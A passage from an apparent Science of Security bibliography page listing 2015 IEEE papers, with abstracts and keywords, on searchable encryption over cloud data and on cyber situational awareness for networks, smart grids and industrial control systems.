Keywords: public key cryptography; statistical analysis; telecommunication security; EPEKS; Nishioka security notion; binary search; cloud based data hosting service; inverted index-based data encryption; keyword search scheme; public key encryption; statistical IND-PEKS-CKA security; statistical search pattern privacy; Encryption; Indexes; Privacy; Public key; Servers (ID#: 16-9154)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357615&isnumber=7357245

 

Wang, Boyang; Li, Ming; Wang, Haitao; Li, Hui, "Circular Range Search on Encrypted Spatial Data," in Communications and Network Security (CNS), 2015 IEEE Conference on, pp. 182-190, 28-30 Sept. 2015. doi: 10.1109/CNS.2015.7346827

Abstract: Searchable encryption is a promising technique enabling meaningful search operations to be performed on encrypted databases while protecting user privacy from untrusted third-party service providers. However, while most of the existing works focus on common SQL queries, geometric queries on encrypted spatial data have not been well studied. Especially, circular range search is an important type of geometric query on spatial data which has wide applications, such as proximity testing in Location-Based Services and Delaunay triangulation in computational geometry. In this paper, we propose two novel symmetric-key searchable encryption schemes supporting circular range search. Informally, both of our schemes can correctly verify whether a point is inside a circle on encrypted spatial data without revealing data privacy or query privacy to a semi-honest cloud server. We formally define the security of our proposed schemes, prove that they are secure under Selective Chosen-Plaintext Attacks, and evaluate their performance through experiments in a real-world cloud platform (Amazon EC2).

Keywords: Cloud computing; Data privacy; Encryption; Nearest neighbor searches; Servers; Spatial databases (ID#: 16-9155)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7346827&isnumber=7346791

 

Pengyan Shen; Kai Guo; Mingzhong Xiao; Quanqing Xu, "Spy: A QoS-Aware Anonymous Multi-Cloud Storage System Supporting DSSE," in Cluster, Cloud and Grid Computing (CCGrid), 2015 15th IEEE/ACM International Symposium on, pp.951-960, 4-7 May 2015. doi: 10.1109/CCGrid.2015.88

Abstract: Constructing an overlay storage system based on multiple personal cloud storages is a desirable technique and novel idea for cloud storages. Existing designs provide the basic functions with some customized features. Unfortunately, some important issues have always been ignored including privacy protection, QoS and cipher-text search. In this paper, we present Spy, our design for an anonymous storage overlay network on multiple personal cloud storage, supporting a flexible QoS awareness and cipher-text search. We reform the original Tor protocol by extending the command set and adding a tail part to the Tor cell, which makes it possible for coordination among proxy servers and still keeps the anonymity. Based on which, we proposed a flexible user-defined QoS policy and employed a Dynamic Searchable Symmetric Encryption (DSSE) scheme to support secure cipher-text search. Extensive security analysis prove the security on privacy preserving and experiments show how different QoS policy work according to different security requirements.

Keywords: cloud computing; cryptography; data privacy; information retrieval; quality of service; storage management; DSSE; QoS-aware anonymous multicloud storage system; Spy; Tor cell; Tor protocol; anonymous storage overlay network; cipher-text search; dynamic searchable symmetric encryption scheme; flexible QoS awareness; flexible user-defined QoS policy; multiple personal cloud storage; multiple personal cloud storages; overlay storage system; privacy protection; security requirements; Cloud computing; Encryption; Indexes; Quality of service; Servers; Cipher-text search; DSSE; PCS; Privacy Preserving; QoS (ID#: 16-9156)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7152581&isnumber=7152455

 

Dongsheng Wang; Xiaohua Jia; Cong Wang; Kan Yang; Shaojing Fu; Ming Xu, "Generalized Pattern Matching String Search on Encrypted Data in Cloud Systems," in Computer Communications (INFOCOM), 2015 IEEE Conference on, pp. 2101-2109, April 26 2015-May 1 2015. doi: 10.1109/INFOCOM.2015.7218595

Abstract: Searchable encryption is an important and challenging issue. It allows people to search on encrypted data. This is a very useful function when more and more people choose to host their data in the cloud and the cloud server is not fully trustable. Existing solutions for searchable encryption are only limited to some simple functions of search, such as boolean search or similarity search. In this paper, we propose a scheme for Generalized Pattern-matching String-search on Encrypted data (GPSE) in cloud systems. GPSE allows users to specify their search queries by using generalized wildcard-based string patterns (such as SQL-like patterns). It gives users great expressive power in specifying highly targeted search queries. In the framework of GPSE, we particularly implemented two most commonly used pattern matching search functions on encrypted data, the substring matching and the longest-prefix-first matching. We also prove that GPSE is secure under the known-plaintext model. Experiments over real data sets show that GPSE achieves high search accuracy.

Keywords: cloud computing; cryptography; query processing; string matching; GPSE scheme;cloud systems; encrypted data; generalized pattern matching string search; generalized wildcard-based string patterns; known-plaintext model; longest-prefix-first matching; search query specification; searchable encryption; substring matching; Accuracy; Cryptography; Euclidean distance; Indexes; Pattern matching; Servers (ID#: 16-9157)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7218595&isnumber=7218353

 

Boyang Wang; Ming Li; Haitao Wang; Hui Li, "Circular Range Search on Encrypted Spatial Data," in Distributed Computing Systems (ICDCS), 2015 IEEE 35th International Conference on, pp. 794-795, June 29 2015-July 2 2015. doi: 10.1109/ICDCS.2015.113

Abstract: Searchable encryption is a promising technique enabling meaningful search operations to be performed on encrypted databases while protecting user privacy from untrusted third-party service providers. However, while most of the existing works focus on common SQL queries, geometric queries on encrypted spatial data have not been well studied. Especially, circular range search is an important type of geometric query on spatial data which has wide applications, such as proximity testing in Location-Based Services and Delaunay triangulation in computational geometry. In this poster, we propose two novel symmetric-key searchable encryption schemes supporting circular range search. Informally, both of our schemes can correctly verify whether a point is inside a circle on encrypted spatial data without revealing data privacy or query privacy to a semi-honest cloud server. We formally define the security of our proposed schemes, prove that they are secure under Selective Chosen-Plaintext Attacks, and evaluate their performance through experiments in a real-world cloud platform (Amazon EC2). To the best of our knowledge, this work represents the first study in secure circular range search on encrypted spatial data.

Keywords: SQL; computational geometry; data privacy; mesh generation; private key cryptography; query processing; Amazon EC2;Delaunay triangulation; SQL query; circular range search; computational geometry; data privacy; encrypted database; encrypted spatial data; geometric query; location-based service; proximity testing; query privacy; selective chosen-plaintext attack; semi-honest cloud server; symmetric-key searchable encryption scheme; user privacy protection; Companies; Data privacy; Encryption; Servers; Spatial databases (ID#: 16-9158)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7164991&isnumber=7164877


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to news@scienceofsecurity.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


 

Situational Awareness 2015

 

 
SoS Logo

Situational Awareness 2015

 

Situational awareness is an important human factor for cyber security that impacts resilience, predictive metrics, and composability.  The works cited here were presented in 2015.


Hall, M.J.; Hansen, D.D.; Jones, K., "Cross-domain situational awareness and collaborative working for cyber security," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166110

Abstract: Enhancing situational awareness is a major goal for organisations spanning many sectors, working across many domains. An increased awareness of the state of environments enables improved decision-making. Endsley's model of situational awareness has improved the understanding for the design of decision-support systems. This paper presents and discusses a theoretical model to extend this to cross-domain working to influence the design of future collaborative systems. A use-case is discussed within a military context of the use of this model for cross-domain working between an operational-domain and cyber security-domain.

keywords: decision making;decision support systems;groupware;security of data;collaborative working;cross-domain situational awareness;cyber security-domain;decision-support systems;future collaborative systems;improved decision-making;operational-domain;Aerodynamics;Collaboration;Context;Decision making;Feeds;Malware;Collaboration;Cross Domain;Cyber Security;Situational Awareness (ID#: 16-9269)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166110&isnumber=7166109

 

Skopik, F.; Wurzenberger, M.; Settanni, G.; Fiedler, R., "Establishing national cyber situational awareness through incident information clustering," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166126

Abstract: The number and type of threats to modern information and communication networks has increased massively in the recent years. Furthermore, the system complexity and interconnectedness has reached a level which makes it impossible to adequately protect networked systems with standard security solutions. There are simply too many unknown vulnerabilities, potential configuration mistakes and therefore enlarged attack surfaces and channels. A promising approach to better secure today's networked systems is information sharing about threats, vulnerabilities and indicators of compromise across organizations; and, in case something went wrong, to report incidents to national cyber security centers. These measures enable early warning systems, support risk management processes, and increase the overall situational awareness of organizations. Several cyber security directives around the world, such as the EU Network and Information Security Directive and the equivalent NIST Framework, demand specifically national cyber security centers and policies for organizations to report on incidents. However, effective tools to support the operation of such centers are rare. Typically, existing tools have been developed with the single organization as customer in mind. These tools are often not appropriate either for the large amounts of data or for the application use case at all. In this paper, we therefore introduce a novel incident clustering model and a system architecture along with a prototype implementation to establish situational awareness about the security of participating organizations. This is a vital prerequisite to plan further actions towards securing national infrastructure assets.

keywords: business data processing;national security;organisational aspects;pattern clustering;security of data;software architecture;EU Network and Information Security Directive;NIST framework;attack channels;attack surfaces;cyber security directives;early warning systems;incident information clustering;information and communication networks;information sharing;national cyber security centers;national cyber situational awareness;national infrastructure assets;networked systems protection;organizations;risk management processes;standard security solutions;system architecture;system complexity;system interconnectedness;threats;Clustering algorithms;Computer security;Information management;Market research;Organizations;Standards organizations (ID#: 16-9270)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166126&isnumber=7166109

 

Shovgenya, Y.; Skopik, F.; Theuerkauf, K., "On demand for situational awareness for preventing attacks on the smart grid," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-4, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166133

Abstract: Renewable energy sources and widespread small-scale power generators change the structure of the power grid, where actual power consumers also temporarily become suppliers. Smart grids require continuous management of complex operations through utility providers, which leads to increasing interconnections and usage of ICT-enabled industrial control systems. Yet, often insufficiently implemented security mechanisms and the lack of appropriate monitoring solutions will make the smart grid vulnerable to malicious manipulations that may possibly result in severe power outages. Having a thorough understanding about the operational characteristics of smart grids, supported by clearly defined policies and processes, will be essential to establishing situational awareness, and thus, the first step for ensuring security and safety of the power supply.

keywords: electric generators;electricity supply industry;industrial control;power consumption;power generation control;power generation reliability;power system interconnection;power system management;power system security;renewable energy sources;smart power grids;ICT-enabled industrial control system;actual power consumer;implemented security mechanism;power supply safety;power supply security;renewable energy source;situational awareness;small-scale power generator;smart power grid;Europe;Generators;Power generation;Renewable energy sources;Security;Smart grids;Smart meters;industrial control systems;situational awareness;smart generator;smart grid (ID#: 16-9271)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166133&isnumber=7166109

 

Song, R.; Brown, J.D.; Tang, H.; Salmanian, M., "Secure and efficient routing by Leveraging Situational Awareness Messages in tactical edge networks," in Military Communications and Information Systems (ICMCIS), 2015 International Conference on, pp. 1-8, 18-19 May 2015. doi: 10.1109/ICMCIS.2015.7158713

Abstract: A desired capability in military operations is the reliable and efficient sharing of Situational Awareness (SA) data at the tactical edge network. Many implementations of SA sharing in the literature use frequent broadcasts of SA messages in order to provide an up-to-date and comprehensive operating picture to all nodes. However, SA sharing may result in an increase in bandwidth requirements at the tactical edge, where power and bandwidth are scarce. Efficient realtime routing is also a challenge in a tactical edge network. We believe there is a good opportunity to leverage the realtime periodic SA messages for assisting routing services. To the best of our knowledge, little research has been done on this front. In this paper, we propose a secure and efficient routing by leveraging SA messages (SER-SA) in tactical edge mobile ad hoc networks. The SER-SA protocol utilizes realtime broadcast SA messages to not only transmit SA data but also to facilitate Multipoint Relay (MPR) node selection and route discovery for providing both realtime broadcast and unicast communication services. In SER-SA, broadcast forwarding is performed only by MPR nodes, which can reduce bandwidth usage compared to pure flooding methods such as Multicast Ad hoc On-Demand Distance Vector Routing (MAODV). In addition, we reduce bandwidth usage even further by both avoiding dissemination of specific designated routing messages in the network and enhancing the (traditionally local) MPR selection algorithm based on a global algorithm enabled by the shared global SA. We show through simulations that the proposed SER-SA protocol facilitates route discovery in a more bandwidth efficient manner. As a result, it performs better in terms of delivery ratio for providing both broadcast and unicast services in tactical scenarios compared to the existing MANET multicast routing protocols such as Multicast Optimized Link State Routing and MAODV.

keywords: broadcast communication;military communication;mobile ad hoc networks;relay networks (telecommunication);routing protocols;telecommunication security;MPR selection algorithm;SA message leveraging;SER- SA routing protocol;SER-SA;bandwidth usage reduction;broadcast communication service;multipoint relay node selection;route discovery;situational awareness message leveraging;tactical edge mobile ad hoc network security;unicast communication service;Bandwidth;Network topology;Routing;Routing protocols;Topology;Unicast (ID#: 16-9272)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7158713&isnumber=7158667

 

Evesti, A.; Frantti, T., "Situational Awareness for security adaptation in Industrial Control Systems," in Ubiquitous and Future Networks (ICUFN), 2015 Seventh International Conference on, pp. 1-6, 7-10 July 2015. doi: 10.1109/ICUFN.2015.7182484

Abstract: Situational Awareness (SA) offers an analysed view of system's security posture. Securing Industrial Control Systems (ICSs) and critical infrastructures requires timely and correct SA. System administrators make decisions and modify security mechanisms based on SA information. In this paper, we envision how security adaptation can facilitate administrators' work in the ICS protection. Security adaptation is not widely applied in ICS context. Moreover, existing security adaptation approaches concentrate on recognition of an adaptation need, i.e,. building situational awareness, instead of security decision making. Therefore, we present steps to create a security adaptation plan, and apply fuzzy set theory and linguistic relations for decision making, when SA information indicates that required security is not reached.

keywords: control engineering computing;critical infrastructures;decision making;industrial control;security of data;ICS protection;SA information;fuzzy set theory;industrial control systems;linguistic relations;security adaptation approach;security adaptation plan;security decision making;security mechanisms;system administrators;system security posture;Adaptation models;Analytical models;Authentication;Decision making;Monitoring;Pragmatics;ICS;critical infrastructure;decision making;self-adaptation;self-protection (ID#: 16-9273)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7182484&isnumber=7182475

 

Gray, C.C.; Ritsos, P.D.; Roberts, J.C., "Contextual network navigation to provide situational awareness for network administrators," in Visualization for Cyber Security (VizSec), 2015 IEEE Symposium on, pp. 1-8, 25-25 Oct. 2015. doi: 10.1109/VIZSEC.2015.7312769

Abstract: One of the goals of network administrators is to identify and block sources of attacks from a network steam. Various tools have been developed to help the administrator identify the IP or subnet to be blocked, however these tend to be non-visual. Having a good perception of the wider network can aid the administrator identify their origin, but while network maps of the Internet can be useful for such endeavors, they are difficult to construct, comprehend and even utilize in an attack, and are often referred to as being “hairballs”. We present a visualization technique that displays pathways back to the attacker; we include all potential routing paths with a best-efforts identification of the commercial relationships involved. These two techniques can potentially highlight common pathways and/or networks to allow faster, more complete resolution to the incident, as well as fragile or incomplete routing pathways to/from a network. They can help administrators re-profile their choice of IP transit suppliers to better serve a target audience.

 

 

keywords: IP networks;Internet;computer network security;data visualisation;telecommunication network routing;IP;IP transit suppliers;Internet;attacks sources;best-efforts identification;commercial relationships;contextual network navigation;hairballs;incomplete routing pathways;network administrators;network maps;network steam;routing paths;situational awareness;subnet;visualization technique;Data visualization;Internet;Navigation;Peer-to-peer computing;Planning;Routing;Visualization (ID#: 16-9274)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7312769&isnumber=7312757

 

Sheng Miao; Hammell, R.J.; Ziying Tang; Hanratty, T.; Dumer, J.; Richardson, J., "Integrating complementary/contradictory information into fuzzy-based VoI determinations," in Computational Intelligence for Security and Defense Applications (CISDA), 2015 IEEE Symposium on, pp. 1-7, 26-28 May 2015. doi: 10.1109/CISDA.2015.7208636

Abstract: In today's military environment vast amounts of disparate information are available. To aid situational awareness it is vital to have some way to judge information importance. Recent research has developed a fuzzy-based system to assign a Value of Information (VoI) determination for individual pieces of information. This paper presents an investigation of the effect of integrating subsequent complementary and/or contradictory information into the VoI process. Specifically, the idea of using complementary and/or contradictory new information to impact the previously used fuzzy membership values for the information content characteristic applied in the VoI calculations is shown to be a particularly suitable approach.

keywords: content-addressable storage;fuzzy set theory;information systems;military computing;VoI process;complementary-contradictory information integration;fuzzy membership values;fuzzy-based VoI determinations;fuzzy-based system;information content characteristics;military environment;situational awareness;value of information determination;Decision support systems;decision support;fuzzy associative memory;intelligence analysis;situational awareness;value of information (ID#: 16-9275)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7208636&isnumber=7208613

 

Onwubiko, C., "Cyber security operations centre: Security monitoring for protecting business and supporting cyber defense strategy," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-10, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166125

Abstract: Cyber security operations centre (CSOC) is an essential business control aimed to protect ICT systems and support an organisation's Cyber Defense Strategy. Its overarching purpose is to ensure that incidents are identified and managed to resolution swiftly, and to maintain safe & secure business operations and services for the organisation. A CSOC framework is proposed comprising Log Collection, Analysis, Incident Response, Reporting, Personnel and Continuous Monitoring. Further, a Cyber Defense Strategy, supported by the CSOC framework, is discussed. Overlaid atop the strategy is the well-known Her Majesty's Government (HMG) Protective Monitoring Controls (PMCs). Finally, the difficulty and benefits of operating a CSOC are explained.

keywords: government data processing;security of data;CSOC framework;HMG protective monitoring controls;Her Majestys Government;ICT systems;business control;business protection;cyber defense strategy support;cyber security operations centre;information and communications technology;security monitoring;Business;Computer crime;Monitoring;System-on-chip;Timing;Analysis;CSOC;CSOC Benefits & Challenges;CSOC Strategy;Correlation;Cyber Incident Response;Cyber Security Operations Centre;Cyber Situational Awareness;CyberSA;Log Source;Risk Management;SOC (ID#: 16-9276)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166125&isnumber=7166109

 

Gendreau, A.A., "Situation Awareness Measurement Enhanced for Efficient Monitoring in the Internet of Things," in Region 10 Symposium (TENSYMP), 2015 IEEE, pp. 82-85, 13-15 May 2015. doi: 10.1109/TENSYMP.2015.13

Abstract: The Internet of Things (IoT) is a heterogeneous network of objects that communicate with each other and their owners over the Internet. In the future, the utilization of distributed technologies in combination with their object applications will result in an unprecedented level of knowledge and awareness, creating new business opportunities and expanding existing ones. However, in this paradigm where almost everything can be monitored and tracked, an awareness of the state of the monitoring systems' situation will be important. Given the anticipated scale of business opportunities resulting from new object monitoring and tracking capabilities, IoT adoption has not been as fast as expected. The reason for the slow growth of application objects is the immaturity of the standards, which can be partly attributed to their unique system requirements and characteristics. In particular, the IoT standards must exhibit efficient self-reliant management and monitoring capability, which in a hierarchical topology is the role of cluster heads. IoT standards must be robust, scalable, adaptable, reliable, and trustworthy. These criteria are predicated upon the limited lifetime, and the autonomous nature, of wireless personal area networks (WPANs), of which wireless sensor networks (WSNs) are a major technological solution and research area in the IoT. In this paper, the energy efficiency of a self-reliant management and monitoring WSN cluster head selection algorithm, previously used for situation awareness, was improved upon by sharing particular established application cluster heads. This enhancement saved energy and reporting time by reducing the path length to the monitoring node. Also, a proposal to enhance the risk assessment component of the model is made. We demonstrate through experiments that when benchmarked against both a power and randomized cluster head deployment, the proposed enhancement to the situation awareness metric used less power. Potentially, this approac- can be used to design a more energy efficient cluster-based management and monitoring algorithm for the advancement of security, e.g. Intrusion detection systems (IDSs), and other standards in the IoT.

keywords: Internet of Things;personal area networks;security of data;wireless sensor networks;Internet of Things;WPAN;WSN;distributed technologies;efficient self-reliant management and monitoring capability;heterogeneous network;object monitoring and tracking capabilities;situation awareness measurement;situation awareness metric;wireless personal area networks;wireless sensor networks;Energy efficiency;Internet of things;Monitoring;Security;Standards;Wireless sensor networks;Internet of Things;Intrusion detection system;Situational awareness;Wireless sensor networks (ID#: 16-9277)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166243&isnumber=7166213

 

Abraham, S.; Nair, S., "A Novel Architecture for Predictive CyberSecurity Using Non-homogenous Markov Models," in Trustcom/BigDataSE/ISPA, 2015 IEEE, vol. 1, pp. 774-781, 20-22 Aug. 2015. doi: 10.1109/Trustcom.2015.446

Abstract: Evaluating the security of an enterprise is an important step towards securing its system and resources. However existing research provide limited insight into understanding the impact attacks have on the overall security goals of an enterprise. We still lack effective techniques to accurately measure the predictive security risk of an enterprise taking into account the dynamic attributes associated with vulnerabilities that can change over time. It is therefore critical to establish an effective cyber-security analytics strategy to minimize risk and protect critical infrastructure from external threats before it even starts. In this paper we present an integrated view of security for computer networks within an enterprise, understanding threats and vulnerabilities, performing analysis to evaluate the current as well as future security situation of an enterprise to address potential situations. We formally define a non-homogeneous Markov model for quantitative security evaluation using Attack Graphs which incorporates time dependent covariates, namely the vulnerability age and the vulnerability discovery rate to help visualize the future security state of the network leading to actionable knowledge and insight. We present experimental results from applying this model on a sample network to demonstrate the practicality of our approach.

keywords: Markov processes;computer network security;attack graphs;computer networks;cyber security analytics strategy;dynamic attributes;enterprise security goals;external threats;impact attacks;nonhomogeneous Markov model;nonhomogenous Markov Models;predictive cybersecurity;predictive security risk;quantitative security evaluation;time dependent covariates;Biological system modeling;Computer architecture;Computer security;Markov processes;Measurement;Attack Graph;CVSS;Cyber Situational Awareness;Markov Model;Security Metrics;Vulnerability Discovery Model;Vulnerability Lifecycle Model (ID#: 16-9278)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7345354&isnumber=7345233

 

Angelini, M.; Prigent, N.; Santucci, G., "PERCIVAL: proactive and reactive attack and response assessment for cyber incidents using visual analytics," in Visualization for Cyber Security (VizSec), 2015 IEEE Symposium on, pp. 1-8, 25-25 Oct. 2015. doi: 10.1109/VIZSEC.2015.7312764

Abstract: Situational awareness is a key concept in cyber-defence. Its goal is to make the user aware of different and complex aspects of the network he or she is monitoring. This paper proposes PERCIVAL, a novel visual analytics environment that contributes to situational awareness by allowing the user to understand the network security status and to monitor security events that are happening on the system. The proposed visualization allows for comparing the proactive security analysis with the actual attack progress, providing insights on the effectiveness of the mitigation actions the system has triggered against the attack and giving an overview of the possible attack's evolution. Moreover, the same visualization can be fruitfully used in the proactive analysis since it allows for getting details on computed attack paths and evaluating the mitigation actions that have been proactively computed by the system. A preliminary user study provided a positive feedback on the prototype implementation of the system. A video of the system is available at: https://youtu.be/uMpYCJCX95k.

keywords: data analysis;data visualisation;security of data;PERCIVAL;cyber incidents;cyber-defence;network security status;proactive attack;proactive security analysis;reactive attack;response assessment;security event monitoring;situational awareness;visual analytics environment;visualization;Context;Network topology;Prototypes;Security;Topology;Visual analytics;Cyber-security;attack paths;incident response assessment;proactive analysis (ID#: 16-9279)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7312764&isnumber=7312757

 

Puuska, S.; Kansanen, K.; Rummukainen, L.; Vankka, J., "Modelling and real-time analysis of critical infrastructure using discrete event systems on graphs," in Technologies for Homeland Security (HST), 2015 IEEE International Symposium on, pp. 1-5, 14-16 April 2015. doi: 10.1109/THS.2015.7225330

Abstract: Critical infrastructure (CI) systems form an interdependent network where failures in one system may quickly affect the state of other linked systems. Real-time modelling and analysis of CI systems gives valuable time-critical insight on the situational status during incidents and standard operation. Obtaining real-time quantitative measurements about the state of CI systems is necessary for situational awareness (SA) purposes. In this paper we present a general framework for real-time critical infrastructure modelling and analysis using discrete event systems (DES) on graphs. Our model augments standard graph-theoretic analysis with elements from automata theory to achieve model which captures interdependencies in CI. The framework was tested on various graphs with differing sizes and degree distributions. The resulting framework was implemented, and benchmarks indicate that it is suitable for real-time SA analysis.

keywords: critical infrastructures;discrete event systems;graph theory;modelling;real-time systems;security of data;CI system;DES;SA;automata theory;critical infrastructure;digital security;discrete event system;graph-theoretic analysis;real-time analysis;real-time modelling;situational awareness;Analytical models;Automata;Benchmark testing;Data models;Discrete-event systems;Monitoring;Real-time systems (ID#: 16-9280)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7225330&isnumber=7190491

 

Farantatos, E.; Del Rosso, A.; Bhatt, N.; Kai Sun; Yilu Liu; Liang Min; Chaoyang Jing; Jiawei Ning; Parashar, M., "A hybrid framework for online dynamic security assessment combining high performance computing and synchrophasor measurements," in Power & Energy Society General Meeting, 2015 IEEE, pp. 1-5, 26-30 July 2015. doi: 10.1109/PESGM.2015.7286581

Abstract: A hybrid simulation/measurement-based framework for online dynamic security assessment (DSA) is proposed in this work. It combines the strengths and features of simulation-based and measurement-based approaches to develop a tool that integrates the results and provides real-time situational awareness on available operating margins against major stability problems. High performance computing capability is suggested and used in the simulation-based engine, while synchrophasor measurements are used as the input to the measurement-based stability assessment algorithms. The proposed framework is expected to provide solid foundation for new generation of real-time DSA tools that are needed for operators to assess in real-time the system's dynamic performance and operational security risk.

keywords: parallel processing;phasor measurement;power system security;power system simulation;power system stability;high performance computing capability;measurement-based stability assessment algorithms;online dynamic security assessment;operational security risk;real-time DSA tools;real-time situational awareness;simulation-based engine;stability problems;synchrophasor measurements;Analytical models;Computational modeling;Power system stability;Real-time systems;Stability criteria;Voltage measurement;Angular Stability;Dynamic Security Assessment;High-Performance Computing;Synchrophasors;Transient Stability;Visualizations;Voltage Stability (ID#: 16-9281)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7286581&isnumber=7285590

 

Cintuglu, M.H.; de Azevedo, R.; Ma, T.; Mohammed, O.A., "Real-time experimental analysis for protection and control of smart substations," in Innovative Smart Grid Technologies Latin America (ISGT LATAM), 2015 IEEE PES, pp. 485-490, 5-7 Oct. 2015. doi: 10.1109/ISGT-LA.2015.7381203

Abstract: To reach the future smart grid vision, comprehensively equipped test beds are required for identification of the vulnerabilities, security concerns and the impact analysis of the new control and protection concepts. The future smart substations are expected to have enhanced capabilities such as wide-area situational awareness, interoperability, and self-sustained generation capability to achieve resilient power grid goals. Prior to field deployment, any new protection and control capabilities should pass rigorous tests. With this motivation, this paper presents a real-time experimental analysis for protection and control of smart substations in a state-of the-art test bed platform. A coordinated wide-area protection approach is proposed for transmission and distribution levels enabling interoperability between IEDs at different layers. An aggregated distributed generation and storage dispatch optimization method is proposed for self-sustained smart substations in case of outage such as a blackout situation. In order to validate the proposed protection and control methods, experimental results are given.

keywords: distributed power generation;power generation dispatch;power generation protection;power grids;power transmission protection;substation protection;aggregated distributed generation;coordinated wide area protection;distribution levels;real-time experimental analysis;resilient power grid;self-sustained generation;smart substation control;smart substation protection;storage dispatch optimization;transmission levels;wide-area situational awareness;IEC Standards;Interoperability;Optimization;Protocols;Real-time systems;Smart grids;Substations;Intelligent electronic device;interoperability;phasor measurement unit;protection;smart grid;substation;test bed (ID#: 16-9282)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7381203&isnumber=7381114

 

Paxton, N.C.; Dae-il Jang; Russell, S.; Gail-Joon Ahn; Moskowitz, I.S.; Hyden, P., "Utilizing Network Science and Honeynets for Software Induced Cyber Incident Analysis," in System Sciences (HICSS), 2015 48th Hawaii International Conference on, pp. 5244-5252, 5-8 Jan. 2015. doi: 10.1109/HICSS.2015.619

Abstract: Increasing situational awareness and investigating the cause of a software-induced cyber attack continues to be one of the most difficult yet important endeavors faced by network security professionals. Traditionally, these forensic pursuits are carried out by manually analyzing the malicious software agents at the heart of the incident, and then observing their interactions in a controlled environment. Both these steps are time consuming and difficult to maintain due to the ever changing nature of malicious software. In this paper we introduce a network science based framework which conducts incident analysis on a dataset by constructing and analyzing relational communities. Construction of these communities is based on the connections of topological features formed when actors communicate with each other. We evaluate our framework using a network trace of the Black Energy malware network, captured by our honey net. We have found that our approach is accurate, efficient, and could prove as a viable alternative to the current status quo.

keywords: computer network security;invasive software;software agents;BlackEnergy malware network;honeynet;malicious software agents;network science based framework;network security professionals;network trace;situational awareness;software induced cyber incident analysis;software-induced cyber attack;topological features;Command and control systems;Communities;IP networks;Laboratories;Malware;Servers;Software;Community Detection;Honeynets;Network Forensics (ID#: 16-9283)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7070445&isnumber=7069647

 

Shan Lu; Kokar, M.M., "A situation assessment framework for cyber security information relevance reasoning," in Information Fusion (Fusion), 2015 18th International Conference on, pp. 1459-1466, 6-9 July 2015.  Doi:  (not provided)

Abstract: Cyber security is one of the most serious economic and national challenges faced by nations all over the world. When a cyber security incident occurs, the critical question that security administrators are concerned about is: What has happened? Cyber situation assessment is critical to making correct and timely defense decisions by the analysts. STIX ontology, which was developed by taking advantage of existing cyber security related standards, is used to represent cyber threat information and infer important features of the cyber situation that help decision makers form their situational awareness. However, due to the widespread application of information technology, security analysts face a challenge in information overload. There are still huge volumes of low level observations captured by various sensors and network tools that need to be used to derive the high level intelligence queries such as potential courses of action and future impact. Therefore, identification of the relevant cyber threat information for a specific query is a crucial procedure for cyber situation assessment. In this paper, we leverage the STIX ontology to represent cyber threat information in a logical framework. In order to recognize specific situation types and identify the minimal and sufficient information for answering a query automatically, we propose an information relevance reasoning mechanism based on situation theory. Finally, we implement our proposed framework using a dataset generated by Skaion corporation.

keywords: inference mechanisms;ontologies (artificial intelligence);security of data;STIX ontology;Skaion corporation;cyber security information relevance reasoning;cyber security related standards;cyber situation assessment framework;cyber threat information;defense decisions;high level intelligence queries;information overload;information technology;security analysts;situation theory;situational awareness;Cognition;Computer security;Computers;Knowledge based systems;Ontologies;Semantics (ID#: 16-9284)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7266729&isnumber=7266535

 

Dawson, S.; Crawford, C.; Dillon, E.; Anderson, M., "Affecting operator trust in intelligent multirobot surveillance systems," in Robotics and Automation (ICRA), 2015 IEEE International Conference on, pp. 3298-3304, 26-30 May 2015. doi: 10.1109/ICRA.2015.7139654

